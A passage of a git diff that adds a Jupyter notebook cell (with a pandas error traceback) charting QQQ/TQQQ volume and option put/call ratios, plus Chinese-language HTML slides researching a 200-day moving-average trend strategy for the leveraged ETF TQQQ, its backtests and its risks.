yf\u001b[38;5;241m.\u001b[39mdownload(\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mQQQ\u001b[39m\u001b[38;5;124m\"\u001b[39m, period\u001b[38;5;241m=\u001b[39m\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124m3mo\u001b[39m\u001b[38;5;124m\"\u001b[39m, auto_adjust\u001b[38;5;241m=\u001b[39m\u001b[38;5;28;01mTrue\u001b[39;00m, progress\u001b[38;5;241m=\u001b[39m\u001b[38;5;28;01mFalse\u001b[39;00m)\n\u001b[1;32m 3\u001b[0m tqqq_30 \u001b[38;5;241m=\u001b[39m yf\u001b[38;5;241m.\u001b[39mdownload(\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mTQQQ\u001b[39m\u001b[38;5;124m\"\u001b[39m, period\u001b[38;5;241m=\u001b[39m\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124m3mo\u001b[39m\u001b[38;5;124m\"\u001b[39m, auto_adjust\u001b[38;5;241m=\u001b[39m\u001b[38;5;28;01mTrue\u001b[39;00m, progress\u001b[38;5;241m=\u001b[39m\u001b[38;5;28;01mFalse\u001b[39;00m)\n\u001b[0;32m----> 5\u001b[0m vol_df \u001b[38;5;241m=\u001b[39m \u001b[43mpd\u001b[49m\u001b[38;5;241;43m.\u001b[39;49m\u001b[43mDataFrame\u001b[49m\u001b[43m(\u001b[49m\n\u001b[1;32m 6\u001b[0m \u001b[43m \u001b[49m\u001b[43m{\u001b[49m\n\u001b[1;32m 7\u001b[0m \u001b[43m \u001b[49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[38;5;124;43mQQQ_volume\u001b[39;49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[43m:\u001b[49m\u001b[43m \u001b[49m\u001b[43mqqq_30\u001b[49m\u001b[43m[\u001b[49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[38;5;124;43mVolume\u001b[39;49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[43m]\u001b[49m\u001b[38;5;241;43m.\u001b[39;49m\u001b[43mdropna\u001b[49m\u001b[43m(\u001b[49m\u001b[43m)\u001b[49m\u001b[38;5;241;43m.\u001b[39;49m\u001b[43mtail\u001b[49m\u001b[43m(\u001b[49m\u001b[38;5;241;43m30\u001b[39;49m\u001b[43m)\u001b[49m\u001b[43m,\u001b[49m\n\u001b[1;32m 8\u001b[0m \u001b[43m \u001b[49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[38;5;124;43mTQQQ_volume\u001b[39;49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[43m:\u001b[49m\u001b[43m \u001b[49m\u001b[43mtqqq_30\u001b[49m\u001b[43m[\u001b[49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[38;5;124;43mVolume\u001b[39;49m\u001b[38;5;124;43m\"\u001b[39;49m\u001b[43m]\u001b[49m\u001b[38;5;241;43m.\u001b[39;49m\u001b[43mdropna\u001b[49m\u001b[43m(\u001b[49m\u001b[43m)\u001b[49m\u001b[38;5;241;43m.\u001b[39;49m\u001b[43mtail\u001b[49m\u001b[43m(\u001b[49m\u001b[38;5;241;43m30\u001b[39;49m\u001b[43m)\u001b[49m\u001b[43m,\u001b[49m\n\u001b[1;32m 9\u001b[0m \u001b[43m \u001b[49m\u001b[43m}\u001b[49m\n\u001b[1;32m 10\u001b[0m \u001b[43m)\u001b[49m\u001b[38;5;241m.\u001b[39mdropna()\n\u001b[1;32m 12\u001b[0m fig, ax \u001b[38;5;241m=\u001b[39m plt\u001b[38;5;241m.\u001b[39msubplots(figsize\u001b[38;5;241m=\u001b[39m(\u001b[38;5;241m12\u001b[39m, \u001b[38;5;241m4\u001b[39m))\n\u001b[1;32m 13\u001b[0m ax\u001b[38;5;241m.\u001b[39mplot(vol_df\u001b[38;5;241m.\u001b[39mindex, vol_df[\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mQQQ_volume\u001b[39m\u001b[38;5;124m\"\u001b[39m] \u001b[38;5;241m/\u001b[39m \u001b[38;5;241m1e6\u001b[39m, label\u001b[38;5;241m=\u001b[39m\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mQQQ Volume (M)\u001b[39m\u001b[38;5;124m\"\u001b[39m, linewidth\u001b[38;5;241m=\u001b[39m\u001b[38;5;241m1.6\u001b[39m)\n", + "File \u001b[0;32m/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/pandas/core/frame.py:778\u001b[0m, in \u001b[0;36mDataFrame.__init__\u001b[0;34m(self, data, index, columns, dtype, copy)\u001b[0m\n\u001b[1;32m 772\u001b[0m mgr \u001b[38;5;241m=\u001b[39m \u001b[38;5;28mself\u001b[39m\u001b[38;5;241m.\u001b[39m_init_mgr(\n\u001b[1;32m 773\u001b[0m data, axes\u001b[38;5;241m=\u001b[39m{\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mindex\u001b[39m\u001b[38;5;124m\"\u001b[39m: index, \u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mcolumns\u001b[39m\u001b[38;5;124m\"\u001b[39m: columns}, dtype\u001b[38;5;241m=\u001b[39mdtype, copy\u001b[38;5;241m=\u001b[39mcopy\n\u001b[1;32m 774\u001b[0m )\n\u001b[1;32m 776\u001b[0m \u001b[38;5;28;01melif\u001b[39;00m \u001b[38;5;28misinstance\u001b[39m(data, \u001b[38;5;28mdict\u001b[39m):\n\u001b[1;32m 777\u001b[0m \u001b[38;5;66;03m# GH#38939 de facto copy defaults to False only in non-dict cases\u001b[39;00m\n\u001b[0;32m--> 778\u001b[0m mgr \u001b[38;5;241m=\u001b[39m \u001b[43mdict_to_mgr\u001b[49m\u001b[43m(\u001b[49m\u001b[43mdata\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mindex\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mcolumns\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mdtype\u001b[49m\u001b[38;5;241;43m=\u001b[39;49m\u001b[43mdtype\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mcopy\u001b[49m\u001b[38;5;241;43m=\u001b[39;49m\u001b[43mcopy\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mtyp\u001b[49m\u001b[38;5;241;43m=\u001b[39;49m\u001b[43mmanager\u001b[49m\u001b[43m)\u001b[49m\n\u001b[1;32m 779\u001b[0m \u001b[38;5;28;01melif\u001b[39;00m \u001b[38;5;28misinstance\u001b[39m(data, ma\u001b[38;5;241m.\u001b[39mMaskedArray):\n\u001b[1;32m 780\u001b[0m \u001b[38;5;28;01mfrom\u001b[39;00m\u001b[38;5;250m \u001b[39m\u001b[38;5;21;01mnumpy\u001b[39;00m\u001b[38;5;21;01m.\u001b[39;00m\u001b[38;5;21;01mma\u001b[39;00m\u001b[38;5;250m \u001b[39m\u001b[38;5;28;01mimport\u001b[39;00m mrecords\n", + "File \u001b[0;32m/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/pandas/core/internals/construction.py:503\u001b[0m, in \u001b[0;36mdict_to_mgr\u001b[0;34m(data, index, columns, dtype, typ, copy)\u001b[0m\n\u001b[1;32m 499\u001b[0m \u001b[38;5;28;01melse\u001b[39;00m:\n\u001b[1;32m 500\u001b[0m \u001b[38;5;66;03m# dtype check to exclude e.g. range objects, scalars\u001b[39;00m\n\u001b[1;32m 501\u001b[0m arrays \u001b[38;5;241m=\u001b[39m [x\u001b[38;5;241m.\u001b[39mcopy() \u001b[38;5;28;01mif\u001b[39;00m \u001b[38;5;28mhasattr\u001b[39m(x, \u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mdtype\u001b[39m\u001b[38;5;124m\"\u001b[39m) \u001b[38;5;28;01melse\u001b[39;00m x \u001b[38;5;28;01mfor\u001b[39;00m x \u001b[38;5;129;01min\u001b[39;00m arrays]\n\u001b[0;32m--> 503\u001b[0m \u001b[38;5;28;01mreturn\u001b[39;00m \u001b[43marrays_to_mgr\u001b[49m\u001b[43m(\u001b[49m\u001b[43marrays\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mcolumns\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mindex\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mdtype\u001b[49m\u001b[38;5;241;43m=\u001b[39;49m\u001b[43mdtype\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mtyp\u001b[49m\u001b[38;5;241;43m=\u001b[39;49m\u001b[43mtyp\u001b[49m\u001b[43m,\u001b[49m\u001b[43m \u001b[49m\u001b[43mconsolidate\u001b[49m\u001b[38;5;241;43m=\u001b[39;49m\u001b[43mcopy\u001b[49m\u001b[43m)\u001b[49m\n", + "File \u001b[0;32m/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/pandas/core/internals/construction.py:114\u001b[0m, in \u001b[0;36marrays_to_mgr\u001b[0;34m(arrays, columns, index, dtype, verify_integrity, typ, consolidate)\u001b[0m\n\u001b[1;32m 111\u001b[0m \u001b[38;5;28;01mif\u001b[39;00m verify_integrity:\n\u001b[1;32m 112\u001b[0m \u001b[38;5;66;03m# figure out the index, if necessary\u001b[39;00m\n\u001b[1;32m 113\u001b[0m \u001b[38;5;28;01mif\u001b[39;00m index \u001b[38;5;129;01mis\u001b[39;00m \u001b[38;5;28;01mNone\u001b[39;00m:\n\u001b[0;32m--> 114\u001b[0m index \u001b[38;5;241m=\u001b[39m \u001b[43m_extract_index\u001b[49m\u001b[43m(\u001b[49m\u001b[43marrays\u001b[49m\u001b[43m)\u001b[49m\n\u001b[1;32m 115\u001b[0m \u001b[38;5;28;01melse\u001b[39;00m:\n\u001b[1;32m 116\u001b[0m index \u001b[38;5;241m=\u001b[39m ensure_index(index)\n", + "File \u001b[0;32m/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/pandas/core/internals/construction.py:667\u001b[0m, in \u001b[0;36m_extract_index\u001b[0;34m(data)\u001b[0m\n\u001b[1;32m 664\u001b[0m \u001b[38;5;28;01mraise\u001b[39;00m \u001b[38;5;167;01mValueError\u001b[39;00m(\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mPer-column arrays must each be 1-dimensional\u001b[39m\u001b[38;5;124m\"\u001b[39m)\n\u001b[1;32m 666\u001b[0m \u001b[38;5;28;01mif\u001b[39;00m \u001b[38;5;129;01mnot\u001b[39;00m indexes \u001b[38;5;129;01mand\u001b[39;00m \u001b[38;5;129;01mnot\u001b[39;00m raw_lengths:\n\u001b[0;32m--> 667\u001b[0m \u001b[38;5;28;01mraise\u001b[39;00m \u001b[38;5;167;01mValueError\u001b[39;00m(\u001b[38;5;124m\"\u001b[39m\u001b[38;5;124mIf using all scalar values, you must pass an index\u001b[39m\u001b[38;5;124m\"\u001b[39m)\n\u001b[1;32m 669\u001b[0m \u001b[38;5;28;01mif\u001b[39;00m have_series:\n\u001b[1;32m 670\u001b[0m index \u001b[38;5;241m=\u001b[39m union_indexes(indexes)\n", + "\u001b[0;31mValueError\u001b[0m: If using all scalar values, you must pass an index" + ] + } + ], + "source": [ + "# Volume trend (underlying) + option-chain cross-section\n", + "qqq_30 = yf.download(\"QQQ\", period=\"3mo\", auto_adjust=True, progress=False)\n", + "tqqq_30 = yf.download(\"TQQQ\", period=\"3mo\", auto_adjust=True, progress=False)\n", + "\n", + "vol_df = pd.DataFrame(\n", + " {\n", + " \"QQQ_volume\": qqq_30[\"Volume\"].dropna().tail(30),\n", + " \"TQQQ_volume\": tqqq_30[\"Volume\"].dropna().tail(30),\n", + " }\n", + ").dropna()\n", + "\n", + "fig, ax = plt.subplots(figsize=(12, 4))\n", + "ax.plot(vol_df.index, vol_df[\"QQQ_volume\"] / 1e6, label=\"QQQ Volume (M)\", linewidth=1.6)\n", + "ax.plot(vol_df.index, vol_df[\"TQQQ_volume\"] / 1e6, label=\"TQQQ Volume (M)\", linewidth=1.6)\n", + "ax.set_title(\"Underlying Volume Trend (Last 30 Trading Days)\")\n", + "ax.set_ylabel(\"Millions\")\n", + "ax.legend(loc=\"upper left\")\n", + "plt.show()\n", + "\n", + "# 当前期权链横截面:按到期日聚合 put/call 成交量与持仓量\n", + "try:\n", + " tk = yf.Ticker(\"TQQQ\")\n", + " rows = []\n", + " for exp in tk.options[:8]: # 取前几个到期日,避免图过密\n", + " ch = tk.option_chain(exp)\n", + " put_vol = float(ch.puts[\"volume\"].fillna(0).sum()) if not ch.puts.empty else 0.0\n", + " call_vol = float(ch.calls[\"volume\"].fillna(0).sum()) if not ch.calls.empty else 0.0\n", + " put_oi = float(ch.puts[\"openInterest\"].fillna(0).sum()) if not ch.puts.empty else 0.0\n", + " call_oi = float(ch.calls[\"openInterest\"].fillna(0).sum()) if not ch.calls.empty else 0.0\n", + " rows.append(\n", + " {\n", + " \"expiry\": exp,\n", + " \"put_vol\": put_vol,\n", + " \"call_vol\": call_vol,\n", + " \"put_oi\": put_oi,\n", + " \"call_oi\": call_oi,\n", + " \"pcr_vol\": put_vol / call_vol if call_vol > 0 else np.nan,\n", + " \"pcr_oi\": put_oi / call_oi if call_oi > 0 else np.nan,\n", + " }\n", + " )\n", + " cross = pd.DataFrame(rows)\n", + "\n", + " fig, ax = plt.subplots(1, 2, figsize=(14, 4))\n", + " x = np.arange(len(cross))\n", + " w = 0.38\n", + " ax[0].bar(x - w / 2, cross[\"put_vol\"], width=w, label=\"Put Vol\")\n", + " ax[0].bar(x + w / 2, cross[\"call_vol\"], width=w, label=\"Call Vol\")\n", + " ax[0].set_xticks(x)\n", + " ax[0].set_xticklabels(cross[\"expiry\"], rotation=45, ha=\"right\")\n", + " ax[0].set_title(\"Option Volume by Expiry (TQQQ)\")\n", + " ax[0].legend()\n", + "\n", + " ax[1].plot(cross[\"expiry\"], cross[\"pcr_vol\"], marker=\"o\", label=\"PCR by Volume\")\n", + " ax[1].plot(cross[\"expiry\"], cross[\"pcr_oi\"], marker=\"o\", label=\"PCR by OI\")\n", + " ax[1].axhline(1.0, linestyle=\"--\", color=\"#64748b\")\n", + " ax[1].set_xticklabels(cross[\"expiry\"], rotation=45, ha=\"right\")\n", + " ax[1].set_title(\"Cross-sectional PCR (Current Chain)\")\n", + " ax[1].legend()\n", + "\n", + " plt.tight_layout()\n", + " plt.show()\n", + " display(cross)\n", + "except Exception as exc:\n", + " print(\"期权链横截面绘图失败:\", exc)" + ] + }, + { + "cell_type": "markdown", + "id": "60c7bf9d", + "metadata": {}, + "source": [ + "## 7) 当日执行检查清单(Checklist)\n", + "\n", + "下单前最后确认:\n", + "\n", + "- [ ] 基础信号允许(QQQ 在 MA200 上方)\n", + "- [ ] 有效性通过(`valid_score >= 2`)\n", + "- [ ] 宏观分数不逆风(至少不低于你设定阈值)\n", + "- [ ] 执行方式与波动环境匹配(Direct Buy / Sell Put)\n", + "- [ ] 若 Sell Put:DTE、Delta、IV/HV、流动性都达标\n", + "- [ ] 仓位不超过风控上限\n", + "\n", + "> 如果有 2 项以上不满足,默认降仓或放弃当日开仓。" + ] + }, + { + "cell_type": "markdown", + "id": "718c2a0e", + "metadata": {}, + "source": [ + "## 结论模板(执行前复核)\n", + "\n", + "请在每次实际下单前,复核以下四点:\n", + "\n", + "1. `base_signal` 是否允许开仓(QQQ 是否站上 MA200)\n", + "2. `valid_signal` 是否通过(避免假信号)\n", + "3. `macro_score` 是否支持风险暴露\n", + "4. `execution_mode` 是否匹配当前价格与波动状态\n", + "\n", + "> 如果结论与主观判断冲突,优先降低仓位而不是强行重仓。" + ] + } + ], + "metadata": { + "kernelspec": { + "display_name": "Python 3", + "language": "python", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.11.6" + } + }, + "nbformat": 4, + "nbformat_minor": 5 +} diff --git a/docs/LRS_notebooks/research/.DS_Store b/docs/LRS_notebooks/research/.DS_Store new file mode 100644 index 0000000..6953209 Binary files /dev/null and b/docs/LRS_notebooks/research/.DS_Store differ diff --git a/docs/LRS_notebooks/research/01.html b/docs/LRS_notebooks/research/01.html new file mode 100644 index 0000000..06438aa --- /dev/null +++ b/docs/LRS_notebooks/research/01.html @@ -0,0 +1,137 @@ + + + + + +01 研究动机 — LRS TQQQ 策略研究 + + + + + + + +
+ + +
+ + +
+
+
+ 1.1 + 收益潜力 vs 持有风险 +
+
+ + +
+
-75%
+
+
QQQ 下跌 35% 时,TQQQ 的实际跌幅
+ +
+ +
    +
  • TQQQ = QQQ 日收益率 × 3 倍,牛市弹性极强
  • +
  • QQQ -35%  →  TQQQ 跌幅超 -75%
  • +
  • 从 -75% 回本须涨 300%,复利修复周期极长
  • +
  • 一次大熊市可能抹平多年积累收益
  • +
+ +
+
+ + +
+
+
+ 1.2 + 波动损耗机制(Volatility Decay) +
+
+ + +
+
-9%
+
+ 相同涨跌幅
额外净值损耗 +
+
+
0.7 × 1.3 = 0.91  vs  0.9 × 1.1 = 0.99
+ +
+ +
+
+
QQQ
+
-10% 后 +10%
+
0.9 × 1.1 =
+
0.99
+
+
VS
+
+
TQQQ
+
-30% 后 +30%
+
0.7 × 1.3 =
+
0.91
+
+
+ +
    +
  • 震荡越频繁,净值侵蚀越严重
  • +
  • 结论:震荡 / 下行市持有 TQQQ 是数学必输
  • +
+ +
+
+ + +
+
+
+ 1.3 + LRS 策略的出现背景 +
+
+ + +
+
LRS
+
+
Long-when-Rising Strategy — 趋势驱动的持仓过滤体系
+ +
+ +
+
波动损耗
持有风险
+
+
趋势信号
过滤持仓
+
+ +
    +
  • 客观价格信号替代主观择时预测
  • +
  • 规则驱动,消除情绪干扰与决策偏差
  • +
  • 只在趋势明确阶段持有,捕获杠杆收益
  • +
  • 核心假设:价格趋势具有延续性
  • +
+ +
+
+ +
+
+ + + \ No newline at end of file diff --git a/docs/LRS_notebooks/research/02.html b/docs/LRS_notebooks/research/02.html new file mode 100644 index 0000000..5e89152 --- /dev/null +++ b/docs/LRS_notebooks/research/02.html @@ -0,0 +1,155 @@ + + + + + +02 策略机制 — LRS TQQQ 策略研究 + + + + + + + +
+ + +
+ + +
+
+
+
+ 2.1 +

核心决策规则

+
+
QQQ 200 日均线驱动  ·  规则客观  ·  零主观干预
+
+
+
+
每日收盘后  —  检查 QQQ 收盘价
+
+
+ QQQ 收盘价  高于  200 日均线,
+ 且均线斜率 > -0.5%,连续满足 ≥ 3 天? +
+
+
+
✓  三项全满足
+
+
+
买入 TQQQ
+
▲ 趋势确认,杠杆捕获上涨
+
+
+
+
✗  任一不满足
+
+
+
清仓 / 持有现金
+
▼ 趋势转弱,规避下行风险
+
+
+
+
+ 200 日均线 ≈ 过去 10 个月均价,业界公认的中长期趋势基准
+ 连续 3 天确认:有效过滤单日假突破信号 +
+
+
+
+ + +
+ + +
+
+
+
+ 2.2 +

三层理论假设

+
+
+
+
+
+
+
趋势延续性
+
上涨趋势中继续上涨的概率 > 短期反转概率
+
+
+
+
+
+
均线有效过滤
+
200 日均线识别中长期趋势,而非短期价格噪音
+
+
+
+
+
+
杠杆收益覆盖摩擦成本
+
趋势期内 TQQQ 收益 > 假信号带来的交易摩擦损耗
+
+
+
+
+ + +
+
+
+
+ 2.3 +

本质:非对称风险管理

+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
纯 TQQQ 买入持有LRS 策略
完整承受 3x 下跌放大系统性规避下行风险 ✓
震荡市波动损耗持续侵蚀空仓期完全避开损耗
单次大熊市可抹平多年收益保护复利路径的连续性 ✓
需要极强的持仓心理承受力规则客观,消除情绪干扰
+
+
+ +
+
+
+ + + \ No newline at end of file diff --git a/docs/LRS_notebooks/research/03.html b/docs/LRS_notebooks/research/03.html new file mode 100644 index 0000000..2581c71 --- /dev/null +++ b/docs/LRS_notebooks/research/03.html @@ -0,0 +1,99 @@ + + + + + +03-1 回测概览 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+ +
+
+
+
+ A +

多窗口汇总表

+
+
绿色行:LRS 总收益 ≥ QQQ;红色行:跑输基准
+
+
+
+ Chart A 汇总表 +
+
+
+ +
+
+
+
+
+ B +

总收益与年化 CAGR

+
+
柱:区间总收益率;线:年化 CAGR
+
+
+
+ Chart B 收益对比 +
+
+
+ +
+
+
+
+ 3.1 +

阅读提示

+
+
+
+
    +
  • 具体数值以 Chart A 为准,随数据日期自动更新
  • +
  • 近 2/3/5/10/15 年为独立滚动样本,非嵌套区间
  • +
  • CAGR 按各窗口有效起点至末日的自然年数复利折算
  • +
+
+
+
+ +
+
+ + diff --git a/docs/LRS_notebooks/research/03b.html b/docs/LRS_notebooks/research/03b.html new file mode 100644 index 0000000..77e6e49 --- /dev/null +++ b/docs/LRS_notebooks/research/03b.html @@ -0,0 +1,141 @@ + + + + + +03-2 风险调整指标 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+ +
+
+
+
+
+ C +

Sharpe 对比

+
+
(年化 CAGR − 4%) / 年化波动;虚线 Sharpe = 1
+
+
+
+ Chart C Sharpe +
+
+
+
+
+
+
+ D +

最大回撤

+
+
三策略:LRS / QQQ 买入持有 / TQQQ 买入持有
+
+
+
+ Chart D 回撤 +
+
+
+
+ +
+
+
+
+
+ E +

近 5 年权益曲线

+
+
红底:2022 熊市示意区间;三角:入场 / 出场
+
+
+
+ Chart E 权益曲线 +
+
+
+ +
+
+
+
+
+ 读图 +

Sharpe 与回撤

+
+
+
+
    +
  • Sharpe 用同一无风险利率假设(4%)便于跨策略比较
  • +
  • TQQQ 买入持有波动极高,Sharpe 常低于 QQQ
  • +
  • LRS 通过空仓降低路径依赖,回撤形态与纯多头不同
  • +
+
+
+
+
+
+
+ 读图 +

权益曲线 E

+
+
+
+
    +
  • 三条曲线同一初始资金与同一时间轴
  • +
  • 绿色上三角为策略入场,下三角为平仓(颜色区分盈亏)
  • +
  • 与基准对比时关注相对路径而非单日噪声
  • +
+
+
+
+
+ +
+
+ + + diff --git a/docs/LRS_notebooks/research/03c.html b/docs/LRS_notebooks/research/03c.html new file mode 100644 index 0000000..8da47ab --- /dev/null +++ b/docs/LRS_notebooks/research/03c.html @@ -0,0 +1,115 @@ + + + + + +03-3 市场结构分析 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+ +
+
+
+
+
+ F +

四种市场结构 × 三类指标

+
+
示意性评分(1–5),用于归纳策略适配度,非单一区间回测数字
+
+
+
+ Chart F 热力图 +
+
+
+ +
+
+

趋势牛市

+

均线斜率与价格同向,信号连续性强;LRS 易吃到 TQQQ 趋势段,需关注追高与回撤。

+
+
+

趋势熊市

+

价格持续低于均线,策略以空仓为主;相对基准的关键是少亏时间

+
+
+

震荡市

+

均线附近来回,易出现 Whipsaw;连续三日确认规则用于过滤假突破。

+
+
+

V 型急跌

+

急跌后快速反弹,均线滞后;可能出现晚入场或反复扫损,尾部风险需单独压力测试。

+
+
+
+ +
+
+
+
+ G +

信号时间轴(QQQ 对数 + MA200)

+
+
绿底:信号为真(可持仓逻辑区间);红底:信号为假
+
+
+
+ Chart G 时间轴 +
+
+
+ +
+
+ + + diff --git a/docs/LRS_notebooks/research/04.html b/docs/LRS_notebooks/research/04.html new file mode 100644 index 0000000..8ba8ea3 --- /dev/null +++ b/docs/LRS_notebooks/research/04.html @@ -0,0 +1,77 @@ + + + + + +04-1 历史数据局限性 — LRS TQQQ 策略研究 + + + + + + + +
+ + +
+
+
+
+ 4.1 + 样本与市场结构 +
+
+
    +
  • 回测可观测的是已发生的行情,未来可能出现未覆盖的结构(例如长期高利率 + 高波动)。
  • +
  • TQQQ 上市较晚,早期纳斯达克极端行情只能通过 QQQ 间接讨论,杠杆路径不可完全复现。
  • +
  • 任何「最优参数」都可能是样本内拟合,需在第四章后续节做压力测试。
  • +
+
+
+ +
+
+
+ + 模拟与幸存者偏差 +
+
+
    +
  • 杠杆 ETF 有换仓、费用与流动性约束,回测使用收盘价与固定佣金,与实盘滑点存在差距。
  • +
  • 指数与产品可能经历规则修订;过去可用的工具未来未必相同。
  • +
  • 结论应写成条件概率:在何种假设下策略历史表现如何。
  • +
+
+
+
+ +
+
+
+
+ 小结 +

进入压力测试的理由

+
+
+
+

+ 若仅展示单一「好看区间」,容易高估可复制性。下一节从宏观阶段对照出发,再检验参数敏感性与滚动窗口分布。 +

+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/04b.html b/docs/LRS_notebooks/research/04b.html new file mode 100644 index 0000000..171e25b --- /dev/null +++ b/docs/LRS_notebooks/research/04b.html @@ -0,0 +1,64 @@ + + + + + +04-2 宏观稳健性 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+
+
+
+ H +

宏观阶段对照(示意)

+
+
QQQ 路径与 LRS 可回测范围;2000 年前后无 TQQQ 上市
+
+
+
+ Chart H 宏观对照表 +
+
+
+ +
+
+
+ 解读 + 如何使用这张表 +
+
+
    +
  • 利率、流动性与风险偏好会改变「趋势延续」的概率,均线类策略并非恒定有效。
  • +
  • 极端黑天鹅(单日熔断、流动性枯竭)可能让技术指标短期失效,需单独假设尾部场景。
  • +
+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/04c.html b/docs/LRS_notebooks/research/04c.html new file mode 100644 index 0000000..b9221d8 --- /dev/null +++ b/docs/LRS_notebooks/research/04c.html @@ -0,0 +1,73 @@ + + + + + +04-3 参数敏感性 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+
+
+
+ I +

均线周期扫描

+
+
固定其余规则,仅改变 MA 长度;同一段约 5 年样本
+
+
+
+ Chart I 参数敏感性 +
+
+
+ +
+
+
+
+ 稳健 + 曲线平缓 +
+
+

若在较宽参数带内收益与 Sharpe 无断崖式变化,说明结论对「精确 200 日」依赖较低。

+
+
+
+
+
+ 警惕 + 尖峰与过拟合 +
+
+

若仅单一 MA 显著最优,需怀疑样本内拟合,并缩短训练窗做样本外验证。

+
+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/04d.html b/docs/LRS_notebooks/research/04d.html new file mode 100644 index 0000000..45f71fa --- /dev/null +++ b/docs/LRS_notebooks/research/04d.html @@ -0,0 +1,64 @@ + + + + + +04-4 滚动窗口分析 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+
+
+
+ J +

滚动约 5 年超额收益分布

+
+
横轴:LRS 总收益 − QQQ 总收益(百分点);避免只展示单一固定起点
+
+
+
+ Chart J 滚动窗口 +
+
+
+ +
+
+
+ 读图 + 分布比单点更重要 +
+
+
    +
  • 若大量窗口超额为负,说明策略优势高度依赖特定年代。
  • +
  • 中位数相对零轴的位置,可作为「稳健性」的粗粒度参考。
  • +
+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/05.html b/docs/LRS_notebooks/research/05.html new file mode 100644 index 0000000..0396c5b --- /dev/null +++ b/docs/LRS_notebooks/research/05.html @@ -0,0 +1,97 @@ + + + + + +05 实战执行 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+
+
+
+ 5.1 + 资金投入方式 +
+
+
    +
  • 一次性投入对趋势策略往往更「纯粹」,定投会平滑成本但也可能稀释信号效率。
  • +
  • 若长期看多但短期波动难承受,可拆分建仓,但需预先写明规则避免随意加仓。
  • +
+
+
+ +
+
+
+ 5.2 + 入场时机 +
+
+
    +
  • 信号触发时,价格相对「突破参考价」的距离决定分批还是一次性(与策略 Step 3 一致)。
  • +
  • 牛市末期波动放大,同样信号背后风险预算应不同。
  • +
+
+
+ +
+
+
+ 5.3 + 仓位管理 +
+
+
    +
  • 杠杆 ETF 宜占净资产的有限比例,并预留现金应对补仓与心理波动。
  • +
  • 与其他资产(现金、债券、宽基)搭配可降低组合波动,但会改变收益弹性。
  • +
+
+
+ +
+
+
+ 5.4 + 执行成本 +
+
+
    +
  • 佣金、平台费、买卖价差与滑点会侵蚀高频交易;低频换手下影响相对较小。
  • +
  • 税务(资本利得、持有期)因地区而异,频繁实现盈亏可能改变净收益结构。
  • +
+
+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/06.html b/docs/LRS_notebooks/research/06.html new file mode 100644 index 0000000..253a196 --- /dev/null +++ b/docs/LRS_notebooks/research/06.html @@ -0,0 +1,96 @@ + + + + + +06 风险清单 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+
+
市场结构风险
+
+
    +
  • 震荡市中均线附近反复交叉,可能出现连续小额亏损(Whipsaw)。
  • +
  • 趋势策略在「无趋势」阶段天然缺乏优势。
  • +
+
+
+
+
杠杆工具风险
+
+
    +
  • TQQQ 存在波动损耗、跟踪误差与流动性折价风险。
  • +
  • 极端行情下基金运作与再平衡机制可能与直觉线性三倍关系不一致。
  • +
+
+
+
+
执行与行为风险
+
+
    +
  • 信号出现时能否按纪律执行,比回测曲线更难复制。
  • +
  • 主观干预(提前抄底、延迟止损)往往破坏规则优势。
  • +
+
+
+
+
尾部与监管风险
+
+
    +
  • 黑天鹅与流动性危机可能让技术指标短期全部失真。
  • +
  • 杠杆 ETF 监管与产品条款未来可能变化。
  • +
+
+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/07.html b/docs/LRS_notebooks/research/07.html new file mode 100644 index 0000000..60f4506 --- /dev/null +++ b/docs/LRS_notebooks/research/07.html @@ -0,0 +1,111 @@ + + + + + +07 总结与决策框架 — LRS TQQQ 策略研究 + + + + + + + + +
+ + +
+
+
+
+ 综合 + 策略画像 +
+
+
    +
  • LRS 试图用趋势过滤降低杠杆 ETF 的路径伤害,在多年样本中相对 QQQ 买入持有可体现超额,但不保证未来复现。
  • +
